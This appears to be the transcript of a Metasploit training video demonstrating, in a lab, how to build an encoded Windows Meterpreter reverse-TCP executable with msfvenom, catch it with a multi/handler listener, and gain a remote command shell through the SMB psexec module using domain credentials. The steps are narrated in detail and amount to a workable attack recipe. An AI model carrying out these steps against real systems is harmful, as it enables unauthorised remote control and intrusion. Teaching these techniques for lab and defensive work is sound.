So here we are back at my Linux machine. The first thing we'll do is type msfvenom. msfvenom is a specific tool that's now standalone. It used to be two tools within the Metasploit framework, which is called msfpayload and msfencode, but they've been replaced now with msfvenom. And this is a standalone application. I can just press enter here at a standard command prompt, and it will then list me out all of the values that are available to me. Now, obviously, it's important to understand those values, but I'm actually going to go straight through and just show you the basics of how to do this. So let me just clear this and type msfvenom. And our first key is going to be the dash p, which will be the payload that we wish to bring back when the executable is ran. So I've chosen Windows because this will ultimately generate an executable that I'm going to copy to a Windows machine. When I double click that executable, it's going to create something as a reverse connection to my listener that I will have on the Linux machine so that the two can be connected. So I'm choosing Windows, and I want to have a meterpreter session come back. And what I want to be able to do is just use reverse TCP. And that's my communication mechanism. I want to use meterpreter and reverse TCP. My next command is E, which is to encode. So I want to encode what I'm doing, so it makes it a little bit more complicated for anything to know what my code is actually doing. So I'm going to use one of the default ones. Now you can go online to see others, but this is a standard one there to encode values. I'm then going to do the dash I and then put 5. This is the number of iterations that I want to go through as far as the encoding would go. I would like this to run 5 times, encode it, and then encode it, and then encode it, and encode it, and encode it. You get the idea. What I'm then going to do is use the dash B. And this is actually a kind of a list that says these are the bad characters that we wish to avoid. Now, I'm not going to spend too much time on this one, but I'm going to use a hexadecimal as a bad character that we don't wish to use. What I'm then going to do is type a parameter. Now, you'll notice I typed the word lhost. An lhost is one of the options that when we're utilizing an exploit in Metasploit, it's one of the properties. Or if I choose a payload, so if I choose payload of Windows meterpreter reverse underscore TCP, the first thing it asks me for is an lhost, the lhost being the hack machine, so this machine here. So I'm going to choose lhost equals, and then my IP address of this machine, which is 172.16.1.38. I'm then also going to specify a port, and I'm going to choose SSL. So what I'm now doing in this command line is setting up some of the default properties within this executable. So what that means is that when the executable is double-clicked on the Windows machine, it's going to look for an IP address of 172.16.1.38 and try to make a connection over 443. What I'm then going to do is choose the dash F, and the dash F will allow me to specify the format of this file. And I, of course, I want to create an executable, and then I'm going to pipe that one out, and I'm going to call it payload.exe, and click enter. Now, this will go ahead and use msfvenom, wrap everything together, and output me a payload.executable. So there we have it. So what I should be able to do is just do ls. As you can see, my payload.exe is now available. So I now need to copy the payload.exe file to my other machine so that I am able to tie the two together. So I'm going to minimize my console. I'm going to open my computer, navigate to the share, which I have access to on one of my servers, and open up payloads folder. What I'm also going to do is open a separate window, go to my home directory, and you'll see that my payload.exe file is available. I'm going to copy this, and I'm going to paste this over into my network machine. So let's just minimize that, and let me go back this time to my Metasploit window. So I'm going to put this into a full screen mode. So what we now have is we have an executable copied to a Windows share. that will look at my network machine, this Linux machine here, and try to make a connection over 443. Now, in order for that to work, I need to tell my Linux machine that it needs to be listening for that. So I'm going to type the word use, and I'm going to use an exploit, and I'm going to use one called multi-handler. If I do show options, this is going to come back and say, well, there's not really anything that needs to be set because it's just going to sit there and listen. And I haven't told it to do anything yet. I haven't set a payload. So let me clear and let me type set payload. And remember what we chose in the executable that we generated. We chose Windows, Meterpreter, and we chose reverse TCP. So now we're doing a one-to-one mapping. Whatever we generate in the executable is what we generate here. So I'm now have said, use this multi-handler, tell it to use the same payload. I'm gonna do show options. And now what we'll see is it's expecting a L host and a L port, which was the settings that we had before. So let me clear that again. I'm gonna do set L host, and it will be 172.16.1.38, which is this machine. And then I'm gonna also set my L port to 443, which is the port that we chose. And then what I'm gonna do is simply just choose exploit. So now, as you can tell, my reverse handler is ready on my IP address, ready to listen to 443. Now, if I just hop across to my Windows machine, I can copy this executable to it and then run that exe file. So here we are on my Windows machine. I already have the share open to the payload file. I'm going to copy this locally. We'll just paste it to the desktop for now. And I'm simply going to double click my executable, and we'll leave that going, and I'll flick back to my other machine. And there we have, we're now back at the Linux machine, and you can see that by double clicking the executable, I was able to get a connection from the other machine, which is on the same subnet, and it's coming from a specific port, but it's connecting on 443. Now, what can we do once we're here? Well, actually, this Meterpreter window is actually being ran from that machine. So I should be able to type ifconfig, and I'm able to get my IP address of that machine. I could then also go through and check the host name. I could see what other things were running, or I could run other auxiliary tools to do further investigation. In our previous example, we generated an executable using MSF Venom. We copied that to the other location. We had the executable ran, and at the same time, we created a reverse connection between the two so that I could then interrogate that other Windows machine. Now, that's all good and well, but of course, that means you need to have access or have somebody execute something on your behalf. And that doesn't always work. So Metasploit allows us to do all of that process in the same commands. So let me just clear the screen so we can start from scratch. So first off, we're going to specify an exploit, and it's one that we looked at before, so Windows. I'm going to choose SMB, and we're going to use the PSExec. Now, you may recognize the name PSExec. It's exactly where it comes from. It actually has roots back into the PSExec tool that is in sysinternals. So I'm actually going to specify this one. And then I'm going to ask for show options. And of course, there's lots of options that are available. And of course, we have seen this before, so I'm going to go ahead and start populating the values. Remember that our host and our port are the target machine that we want to get to. So I'm going to clear my screen and then type set our host, which will be my end machine that I'm trying to get to. So 172.16.1.51. And I'm then also going to set a payload that I wish to use. And for this one, what I want it to do is simply just return me a command prompt. A Windows command prompt. I'm going to use reverse TCP. What I'm then going to do is set my L host, which of course is me, which is how it's going to come back. By now you will have gathered that that's what it takes. You need to be able to say, well, I'm the L host. This is my target. This is my communication endpoint. I'm going to leave the L port as the standard 444 because there's no firewalls as such here. And then what I'm going to do is I'm just going to do show options again. And you can see that we have all this information for the payload configured. And if I just scroll back up, we have the R host and the R port configured. And I just need to set my SMB domain username and password, which is what we've used before. So let me just clear this, do setmb domain, which is my Konesis Labs, set SMB user, which will go with our Loki user, set SMB password, remember the secure password that we have. So now we have everything connected. Now what I'm able to do at this point is ready to exploit. So now we'll just exploit. And what you'll see is it will go ahead and create a connection. It will authenticate using the account credential that we have. It will upload a payload in the form of an executable. It will then start that service. It will then delete everything out. It will have been encoded. And then it will come all the way back. And then look what we get. We get a Microsoft Windows command prompt. So I can type in hostname, and it comes back and says my hostname is Magni, which is the name of my machine. I can type ipconfig. I can do a directory listing. I can do all the things that you would expect to do from a Windows command prompt. So that was exactly the same as the last one, except we didn't bring a Meterpreter shell back. We brought a Windows command shell back, using the same thing, but this time, instead of generating the executable up front and then having to execute it, we just push the whole thing together using an exploit within Windows. Okay, so in our example, we utilized MSF Venom, which remember is a standalone tool. And the most important parameters, the dash P, which is the actual payload, which in this case, we chose to use a reverse TCP, the dash E, which was the encoding mechanism that we wish to use. Dash I goes along with that one to give you the number of iterations for encoding. The dash B was the bad characters. And then of course we pass the actual list of parameters that we want to complete. So L host and L port. And then dash F was the format. And we chose an executable. We could have chose a PDF or something else. And then we outputted the name of that one. Of course, in order for this to work, we have to physically copy that file somewhere where someone's going to execute it. Now, that's part one. Part two is opening up Metasploit, creating an exploit, creating a payload that matches the executable one, setting up the same properties, and then exploiting that. And what that does, it just sits there listening, waiting for someone to double-click that executable or open the PDF or browse to the website. Whatever mechanism that you use, ultimately, it really comes down to something happens on a target machine and I have an open connection on my hack machine. Now, Metasploit as a tool allowed me in the second example to basically use a standard exploit. So I used the SMB PS exec. I then told it to go to the target machine, told it to bring me back, in this instance, not a Meterpreter shell, but a Windows command shell from that machine, and passed it an SMB username and a password. Now, of course, you may all wonder where that username and password came from. That's just a regular user account that I have that has access to those machines, whether it's a domain controller or whatever else. It doesn't have administration rights, but it has permissions to those machines. So I'm able to run these commands and see them work. So in summary, we reviewed the exploitation steps, which was to identify the target, then to specify the exploit itself, to create the listener component, and then to actually exploit or to use the modules in Metasploit to push the payload, exploit the device or the machine, and then create the connection. We created an executable payload, and we did this two ways. In the first way, we created it using MSF Venom. In the second way, we use Metasploit in a standard exploit. But the goal was the same. We created a reverse shell using Meterpreter. In the first example, it was a Meterpreter shell. In the second example, it was a Windows shell.